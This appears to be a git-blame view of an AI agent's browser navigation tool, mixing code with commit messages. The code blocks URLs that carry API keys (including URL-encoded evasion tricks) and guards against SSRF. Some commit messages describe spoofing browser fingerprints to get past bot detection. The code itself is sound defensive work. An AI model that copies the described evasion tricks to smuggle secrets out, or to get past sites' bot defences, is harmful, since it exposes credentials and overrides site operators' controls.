- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
import urllib . parse
2026-04-01 02:04:13 +03:00
from agent . redact import _PREFIX_RE
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
url_decoded = urllib . parse . unquote ( url )
if _PREFIX_RE . search ( url ) or _PREFIX_RE . search ( url_decoded ) :
2026-04-01 02:04:13 +03:00
return json . dumps ( {
" success " : False ,
" error " : " Blocked: URL contains what appears to be an API key or token. "
" Secrets must not be sent in URLs. " ,
} )
2026-03-31 11:11:55 +02:00
# SSRF protection — block private/internal addresses before navigating.
2026-03-31 10:40:13 -07:00
# Skipped for local backends (Camofox, headless Chromium without a cloud
# provider) because the agent already has full local network access via
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# the terminal tool. Also skipped when hybrid routing will auto-spawn a
# local Chromium sidecar for this URL (cloud provider configured +
# private URL + ``browser.auto_local_for_private_urls`` enabled) — the
# cloud provider never sees the URL in that case. Can also be opted
# out globally via ``browser.allow_private_urls`` in config.
effective_task_id = task_id or " default "
nav_session_key = _navigation_session_key ( effective_task_id , url )
auto_local_this_nav = _is_local_sidecar_key ( nav_session_key )
if (
not _is_local_backend ( )
and not auto_local_this_nav
and not _allow_private_urls ( )
and not _is_safe_url ( url )
) :
2026-03-25 15:16:57 -07:00
return json . dumps ( {
" success " : False ,
" error " : " Blocked: URL targets a private or internal address " ,
} )
2026-03-17 02:59:28 -07:00
# Website policy check — block before navigating
2026-03-17 03:11:21 -07:00
blocked = check_website_access ( url )
2026-03-17 02:59:28 -07:00
if blocked :
return json . dumps ( {
" success " : False ,
" error " : blocked [ " message " ] ,
" blocked_by_policy " : { " host " : blocked [ " host " ] , " rule " : blocked [ " rule " ] , " source " : blocked [ " source " ] } ,
} )
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
# Camofox backend — delegate after safety checks pass
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_navigate
return camofox_navigate ( url , task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
if auto_local_this_nav :
logger . info (
" browser_navigate: auto-routing %s to local Chromium sidecar "
" (cloud provider %s stays on cloud for public URLs; "
" set browser.auto_local_for_private_urls: false to disable) " ,
url ,
type ( _get_cloud_provider ( ) ) . __name__ if _get_cloud_provider ( ) else " none " ,
)
2026-01-29 06:10:24 +00:00
# Get session info to check if this is a new session
# (will create one with features logged if not exists)
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
session_info = _get_session_info ( nav_session_key )
2026-01-29 06:10:24 +00:00
is_first_nav = session_info . get ( " _first_nav " , True )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
# Auto-start recording if configured and this is first navigation
2026-01-29 06:10:24 +00:00
if is_first_nav :
session_info [ " _first_nav " ] = False
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
_maybe_start_recording ( nav_session_key )
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
result = _run_browser_command ( nav_session_key , " open " , [ url ] , timeout = max ( _get_command_timeout ( ) , 60 ) )
# Remember which session served this nav so snapshot/click/fill/...
# on the same task_id hit it (critical when hybrid routing has both a
# cloud session and a local sidecar alive concurrently).
_last_active_session_key [ effective_task_id ] = nav_session_key
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
title = data . get ( " title " , " " )
final_url = data . get ( " url " , url )
2026-03-25 15:16:57 -07:00
# Post-redirect SSRF check — if the browser followed a redirect to a
# private/internal address, block the result so the model can't read
# internal content via subsequent browser_snapshot calls.
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# Skipped for local backends (same rationale as the pre-nav check),
# and for the hybrid local sidecar (we're already on a local browser
# hitting a private URL by design).
if (
not _is_local_backend ( )
and not auto_local_this_nav
and not _allow_private_urls ( )
and final_url and final_url != url and not _is_safe_url ( final_url )
) :
2026-03-25 15:16:57 -07:00
# Navigate away to a blank page to prevent snapshot leaks
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
_run_browser_command ( nav_session_key , " open " , [ " about:blank " ] , timeout = 10 )
2026-03-25 15:16:57 -07:00
return json . dumps ( {
" success " : False ,
chore: fix 154 f-strings, simplify getattr/URL patterns, remove dead code (#3119)
Three categories of cleanup, all zero-behavioral-change:
1. F-strings without placeholders (154 fixes across 29 files)
- Converted f'...' to '...' where no {expression} was present
- Heaviest files: run_agent.py (24), cli.py (20), honcho_integration/cli.py (34)
2. Simplify defensive patterns in run_agent.py
- Added explicit self._is_anthropic_oauth = False in __init__ (before
the api_mode branch that conditionally sets it)
- Replaced 7x getattr(self, '_is_anthropic_oauth', False) with direct
self._is_anthropic_oauth (attribute always initialized now)
- Added _is_openrouter_url() and _is_anthropic_url() helper methods
- Replaced 3 inline 'openrouter' in self._base_url_lower checks
3. Remove dead code in small files
- hermes_cli/claw.py: removed unused 'total' computation
- tools/fuzzy_match.py: removed unused strip_indent() function and
pattern_stripped variable
Full test suite: 6184 passed, 0 failures
E2E PTY: banner clean, tool calls work, zero garbled ANSI
2026-03-25 19:47:58 -07:00
" error " : " Blocked: redirect landed on a private/internal address " ,
2026-03-25 15:16:57 -07:00
} )
2026-01-29 06:10:24 +00:00
response = {
" success " : True ,
" url " : final_url ,
" title " : title
}
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Detect common "blocked" page patterns from title/url
blocked_patterns = [
" access denied " , " access to this page has been denied " ,
" blocked " , " bot detected " , " verification required " ,
" please verify " , " are you a robot " , " captcha " ,
